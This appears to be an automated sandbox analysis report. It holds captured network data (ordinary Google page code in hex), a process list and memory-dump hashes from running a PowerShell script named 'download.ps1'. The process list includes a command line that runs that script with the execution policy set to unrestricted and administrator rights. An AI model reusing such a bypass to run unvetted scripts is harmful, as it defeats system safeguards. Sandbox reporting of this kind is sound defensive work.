                                                                                                                      Dec 22, 2024 13:42:13.727745056 CET1236INData Raw: 64 41 6c 6c 7c 7c 28 68 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 29 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 76 61 72 20 6b 3b 28 6b 3d 67 6f 6f 67 6c
                                                                                                                      Data Ascii: dAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;var k;(k=google).lx||(k.lx=function(){});var l=[],m;(m=google).fce||(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(function(){document.d
                                                                                                                      Dec 22, 2024 13:42:13.779371977 CET1236INData Raw: 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64
                                                                                                                      Data Ascii: :30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtc
                                                                                                                      Dec 22, 2024 13:42:13.779392958 CET1236INData Raw: 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68
                                                                                                                      Data Ascii: order-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:n
                                                                                                                      Dec 22, 2024 13:42:13.779408932 CET1236INData Raw: 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e
                                                                                                                      Data Ascii: p-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;w
                                                                                                                      Dec 22, 2024 13:42:13.779448032 CET1236INData Raw: 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78
                                                                                                                      Data Ascii: nline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);backgro
                                                                                                                      Dec 22, 2024 13:42:13.779489994 CET1236INData Raw: 67 62 6d 30 6c 2c 2e 67 62 6d 30 6c 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73
                                                                                                                      Data Ascii: gbm0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;marg


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:07:42:04
                                                                                                                      Start date:22/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:07:42:04
                                                                                                                      Start date:22/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Reset < >
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbc41063c152451e8d71b1afe27eb79529c261f0fde1a94a1d6bc2acc27e7521
                                                                                                                        • Instruction ID: 956527c44e47159cb3797d6981a226d31cb719f80142faff882dc2135e398603
                                                                                                                        • Opcode Fuzzy Hash: bbc41063c152451e8d71b1afe27eb79529c261f0fde1a94a1d6bc2acc27e7521
                                                                                                                        • Instruction Fuzzy Hash: 4CF1B43091CA8D8FEBA8EF28C8557E937D1FF64750F44426EE84DC7291DB3899458B81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f5e9ba8c125f167333cd7f88419ca947ab9c52e3d6a6b9092181e98cc455a4da
                                                                                                                        • Instruction ID: bf8b54d7cece08b7cacf612fdcf007878c838d511c9ddda71a0bc562f35c1823
                                                                                                                        • Opcode Fuzzy Hash: f5e9ba8c125f167333cd7f88419ca947ab9c52e3d6a6b9092181e98cc455a4da
                                                                                                                        • Instruction Fuzzy Hash: 03E1B330A0CA4E8FEBA8EF28C8557E977D1FF64750F04426AD84DC7691CF7899848B81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L_^
                                                                                                                        • API String ID: 0-1225144814
                                                                                                                        • Opcode ID: babb61cd8ce9465d177441f662ada871396dc3f75cc00e9772e508b35e865fe8
                                                                                                                        • Instruction ID: 038ff9f36e680052761ea8c6958c081bade88a647570d3a7c3c4589ef0a6b2ef
                                                                                                                        • Opcode Fuzzy Hash: babb61cd8ce9465d177441f662ada871396dc3f75cc00e9772e508b35e865fe8
                                                                                                                        • Instruction Fuzzy Hash: EF71173290DBC54FE706A76C68561F47FB0FF62764F0801BBD088970D3DB68685A87A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ecb589ebb1272682ee2f79f3754cf297cb8a6adf8f3736c74c93fbaf7eecf61
                                                                                                                        • Instruction ID: 99587b69a630e108f3f147d86912cc90383a1e036a5d76290e17d3a6014f3ffe
                                                                                                                        • Opcode Fuzzy Hash: 1ecb589ebb1272682ee2f79f3754cf297cb8a6adf8f3736c74c93fbaf7eecf61
                                                                                                                        • Instruction Fuzzy Hash: 3012E530A1CA4D8FDB89EF18C495AA97BE1FF69340F14417AD449C7296DB39EC42CB81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b2b6739edd8459940e1abf32220918624ca8e0d2ceb179e76cabc024bfe22c54
                                                                                                                        • Instruction ID: f41db93948920c1344013e027f5eaafceb4d480d685d5eda4c5b82d2afe83c78
                                                                                                                        • Opcode Fuzzy Hash: b2b6739edd8459940e1abf32220918624ca8e0d2ceb179e76cabc024bfe22c54
                                                                                                                        • Instruction Fuzzy Hash: B6A1C972D0D7C25FE713A77868651E97FA0FF63655B2900FBC4848B0D3EA295809C3A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ed07090f275995df11197699c78364f8d5ab6d3449f51aad3f7bb93376a77cc2
                                                                                                                        • Instruction ID: 007c8beef036de0cce51610a1b38061402be7fae608dde3c07ff433c28b82bfe
                                                                                                                        • Opcode Fuzzy Hash: ed07090f275995df11197699c78364f8d5ab6d3449f51aad3f7bb93376a77cc2
                                                                                                                        • Instruction Fuzzy Hash: 32D13E30A18A4D8FDF98EF5CC495AA97BE1FFA8350F14416AE40DD7295CB34E881CB85
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0f894642c473a031afed5c001156d7313d587df7fbb3d1acff62ad0b94c4383a
                                                                                                                        • Instruction ID: 176a4c7fb9f5dff1ada773b883885f17834b70507654c005ef3ca8dbceee08f1
                                                                                                                        • Opcode Fuzzy Hash: 0f894642c473a031afed5c001156d7313d587df7fbb3d1acff62ad0b94c4383a
                                                                                                                        • Instruction Fuzzy Hash: 1DB1C43051DA8D4FEBA8EF28C8557E93BE1FF65350F04426EE84DC3292CB7498458B86
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 37265639bf4d5af496f3ed65ff84f9522bcb11e77862fbad836991561c07f258
                                                                                                                        • Instruction ID: 21ca5112bb20920c67529f2cea9d04f8d3af950ef2f7b8aaa5d745859be76451
                                                                                                                        • Opcode Fuzzy Hash: 37265639bf4d5af496f3ed65ff84f9522bcb11e77862fbad836991561c07f258
                                                                                                                        • Instruction Fuzzy Hash: 8111277180E7C98FD757AB748C291947FB0AF63250B0A01EBD488CB0F3DA695848C7A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246928193.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848e1d000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3cb53a24fe3d53a5d1990820facdca4f42763f88754a48748165b2047afe5962
                                                                                                                        • Instruction ID: 8f2232e77d689cb1d2963f2add768dc11834dc22f57451ebe7e88a87ef0066df
                                                                                                                        • Opcode Fuzzy Hash: 3cb53a24fe3d53a5d1990820facdca4f42763f88754a48748165b2047afe5962
                                                                                                                        • Instruction Fuzzy Hash: E741247180DBC44FE7969B3998459623FF0FF56220F1505DFE088CB1A3DB25A846C7A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d7be5fe93dee4e81b7520d634d8c6de74222b0f472bf8cfc0059a91f6bfe4761
                                                                                                                        • Instruction ID: b88304c2eb40f9693cc98537729a16bd13a5f1fd4812b6b59222a1a9c054e84b
                                                                                                                        • Opcode Fuzzy Hash: d7be5fe93dee4e81b7520d634d8c6de74222b0f472bf8cfc0059a91f6bfe4761
                                                                                                                        • Instruction Fuzzy Hash: 3721283190CB4C4FDB59DFAC984A7E97BE0EBA6321F04426FD049C3192DA74A456CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 49f7bbcc20f301bbd70b025e1f1b20184cb6a24a20d8ccd63149796c7641aedc
                                                                                                                        • Instruction ID: 053b891a89689fff7e4e18e0428bffc3e437c412354cb1a320bd2acd124cf849
                                                                                                                        • Opcode Fuzzy Hash: 49f7bbcc20f301bbd70b025e1f1b20184cb6a24a20d8ccd63149796c7641aedc
                                                                                                                        • Instruction Fuzzy Hash: 06310B3082D68E8EFBB4AF14CC0ABF93294FF65755F80413AD84E960D2DB386945CB15
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 643aa879a4fb92eb3df55465fe6e5ed589bf22b639f6b071dbcc2ff82345d9bf
                                                                                                                        • Instruction ID: 092e1dfd468732cc2c11792487fea7b19cf11b35c7ead0b63a33735463ac75cf
                                                                                                                        • Opcode Fuzzy Hash: 643aa879a4fb92eb3df55465fe6e5ed589bf22b639f6b071dbcc2ff82345d9bf
                                                                                                                        • Instruction Fuzzy Hash: CD01677111CB0C4FD744EF0CE451AA5B7E0FB99364F10056EE58AC7695D736E881CB45
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2251982178.00007FF8491E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff8491e0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3f898db20324d11c1a28b302e35513393581995bd666e46741a5f89790861275
                                                                                                                        • Instruction ID: d22d2e12216c985f56c44adb4a55fb54c13a304419515761d927419406a9f5da
                                                                                                                        • Opcode Fuzzy Hash: 3f898db20324d11c1a28b302e35513393581995bd666e46741a5f89790861275
                                                                                                                        • Instruction Fuzzy Hash: 0DF0F032A0C5858FDB64EB0CE8518B873E0FF05360B0804B7E05DC7063DA2AAC458B54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2251982178.00007FF8491E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff8491e0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dabf7097d7a575d868d5cd626c2f35c16886c902a99d793e31aadf4cbeee97ea
                                                                                                                        • Instruction ID: 1b272f82fad3b1136cf0021c136179320cb4aaebf557ee5726554e2deb0eefd4
                                                                                                                        • Opcode Fuzzy Hash: dabf7097d7a575d868d5cd626c2f35c16886c902a99d793e31aadf4cbeee97ea
                                                                                                                        • Instruction Fuzzy Hash: 56F09A32A0D5858FEB64EB5CA4548A8B7E0FF05360B0804B6E059C70A3DA2AEC408B51
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,I$0,I$8,I$@,I$P,I$X,I$`,I$h,I$x,I$,I$,I
                                                                                                                        • API String ID: 0-2899012353
                                                                                                                        • Opcode ID: f95bf2145199351b543daf6b55f2d45b7b567f02c1c8cdb6874431790b4e23ae
                                                                                                                        • Instruction ID: 0e634cf3a23bc8316b31ee4b3c5a1dbc97d74ee467cea84a46217488955c1a40
                                                                                                                        • Opcode Fuzzy Hash: f95bf2145199351b543daf6b55f2d45b7b567f02c1c8cdb6874431790b4e23ae
                                                                                                                        • Instruction Fuzzy Hash: 59A1D823E0E5C24EF296637C7C150F96F60FF526B4F0942FBD1884A5CB991A5C4A83DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,I$0,I$8,I$@,I$X,I$`L_I$`,I$aL_I$h,I$x,I$,I
                                                                                                                        • API String ID: 0-4155535867
                                                                                                                        • Opcode ID: b4d956a6459099f2cfe702c91a75ae16bffec1c97705d092b4e4a6d652654696
                                                                                                                        • Instruction ID: 0ff10270d8b7245273238cccaabeaa77f3cdd2e0de44f4eb0822c9eb8ede21c1
                                                                                                                        • Opcode Fuzzy Hash: b4d956a6459099f2cfe702c91a75ae16bffec1c97705d092b4e4a6d652654696
                                                                                                                        • Instruction Fuzzy Hash: 8B51FA73E0E9C24FF296573C381A1787F90FF52AA0F5946FBC0845B5DBAA259C0642C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,I$0,I$8,I$@,I$X,I$`L_I$`,I$aL_I$h,I$x,I$,I
                                                                                                                        • API String ID: 0-4155535867
                                                                                                                        • Opcode ID: 25b00b615e227e4ace3b6e2e0c6578a438f7cb09d5486e7bdb6d1b0a398c4b05
                                                                                                                        • Instruction ID: 5a1f29896e86a08d5ba8d3a3e9c345afbd203e806474c19b63cc4def3116541e
                                                                                                                        • Opcode Fuzzy Hash: 25b00b615e227e4ace3b6e2e0c6578a438f7cb09d5486e7bdb6d1b0a398c4b05
                                                                                                                        • Instruction Fuzzy Hash: 4251BA73D0E9C24FF2E5572C38191347F80FFA2AA0B5946FBD188575DBAA25EC0642C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: I$JL_^$pd-I$d-I
                                                                                                                        • API String ID: 0-383827745
                                                                                                                        • Opcode ID: f967aa8ac3a929ffcf5efad1324dab66cea959b4344d7a682e8974fb4fa2ce55
                                                                                                                        • Instruction ID: 0995016639357649b8783a35f2687740898f54b256fdc138b3c94b5dbc4bb0b8
                                                                                                                        • Opcode Fuzzy Hash: f967aa8ac3a929ffcf5efad1324dab66cea959b4344d7a682e8974fb4fa2ce55
                                                                                                                        • Instruction Fuzzy Hash: B0510A23E0E5C24FE315677C78120F93F60EF526B5F0942BBC2888A1D7D919984A83DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2247602306.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L_^$L_^$L_^$L_^
                                                                                                                        • API String ID: 0-3303188664
                                                                                                                        • Opcode ID: ddec42c34c46095f3ff5692fc57ea50094300ddbebe7aefd3716bdc0269a7191
                                                                                                                        • Instruction ID: 9c820772ba9c5cb771b1addfea4eaf4f6b5036a43bbc902274e71526c107b6e1
                                                                                                                        • Opcode Fuzzy Hash: ddec42c34c46095f3ff5692fc57ea50094300ddbebe7aefd3716bdc0269a7191
                                                                                                                        • Instruction Fuzzy Hash: 393116B791D5C65FE31A6729A8560E83B90FF2165EB5C00FAC18C4B1C3EF1E680B8649